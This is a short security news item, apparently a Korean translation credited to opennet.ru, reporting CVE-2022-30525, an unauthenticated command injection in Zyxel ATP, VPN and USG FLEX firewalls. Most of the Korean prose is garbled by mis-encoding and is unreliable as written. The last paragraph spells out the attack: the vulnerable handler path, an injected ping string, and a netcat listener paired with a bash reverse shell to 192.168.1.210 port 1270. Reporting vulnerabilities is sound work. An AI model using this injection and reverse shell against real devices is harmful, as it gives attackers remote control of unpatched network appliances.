๊ธฐ์ ์ ๋ฐฉํ๋ฒฝ, IDS ๋ฐ VPN ์๋์ ๊ตฌ์ฑํ๋๋ก ์ค๊ณ๋ ATP, VPN ๋ฐ USG FLEX ์๋ฆฌ์ฆ์ Zyxel ์ฅ์น์์ ์ฌ๊ฐํ ์ทจ์ฝ์ (CVE-2022-30525)์ด ํ์ธ๋์์ต๋๋ค. ์ด๋ฅผ ํตํด ์ธ๋ถ ๊ณต๊ฒฉ์๊ฐ ์ปดํจํฐ์์ ์ฝ๋๋ฅผ ์คํํ ์ ์์ต๋๋ค. ์ธ์ฆ ์์ด ์ฌ์ฉ์ ๊ถํ์ด ์๋ ์ฅ์น. ๊ณต๊ฒฉ์ ์ํํ๋ ค๋ฉด ๊ณต๊ฒฉ์๊ฐ HTTP/HTTPS ํ๋กํ ์ฝ์ ์ฌ์ฉํ์ฌ ์ฅ์น์ ์์ฒญ์ ๋ณด๋ผ ์ ์์ด์ผ ํฉ๋๋ค. Zyxel์ ZLD 5.30 ํ์จ์ด ์ ๋ฐ์ดํธ์ ์ทจ์ฝ์ฑ์ ์์ ํ์ต๋๋ค. Shodan ์๋น์ค์ ๋ฐ๋ฅด๋ฉด ํ์ฌ ๊ธ๋ก๋ฒ ๋คํธ์ํฌ์๋ HTTP/HTTPS๋ฅผ ํตํด ์์ฒญ์ ์๋ฝํ๋ ์ ์ฌ์ ์ผ๋ก ์ทจ์ฝํ ์ฅ์น๊ฐ 16213๊ฐ โโ์์ต๋๋ค.
์ธ์ฆ ์์ด ์ก์ธ์คํ ์ ์๋ ์น ํธ๋ค๋ฌ /ztp/cgi-bin/handler์ ํน๋ณํ ์ค๊ณ๋ ๋ช ๋ น์ ์ ์กํ์ฌ ์์ ์ด ์ํ๋ฉ๋๋ค. ์ด ๋ฌธ์ ๋ lib_wan_settings.py ๋ผ์ด๋ธ๋ฌ๋ฆฌ์์ ์ฌ์ฉ๋๊ณ setWanPortSt ์์ ์ ์ฒ๋ฆฌํ ๋ ์คํ๋๋ os.system ํธ์ถ์ ์ฌ์ฉํ์ฌ ์์คํ ์์ ๋ช ๋ น์ ์คํํ ๋ ์์ฒญ ๋งค๊ฐ๋ณ์๊ฐ ์ ๋๋ก ์ ๋ฆฌ๋์ง ์์ ๋ฐ์ํฉ๋๋ค.
์๋ฅผ ๋ค์ด, ๊ณต๊ฒฉ์๋ ๋ฌธ์์ด โ; ํ 192.168.1.210;" ๊ทธ๋ฌ๋ฉด ์์คํ
์์ "ping 192.168.1.210" ๋ช
๋ น์ด ์คํ๋ฉ๋๋ค. ๋ช
๋ น ์
ธ์ ์ก์ธ์คํ๋ ค๋ฉด ์์คํ
์์ โnc -lvnp 1270โ์ ์คํํ ๋ค์ '; bash -c \ยปexec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\ยป;'.
์ถ์ฒ : opennet.ru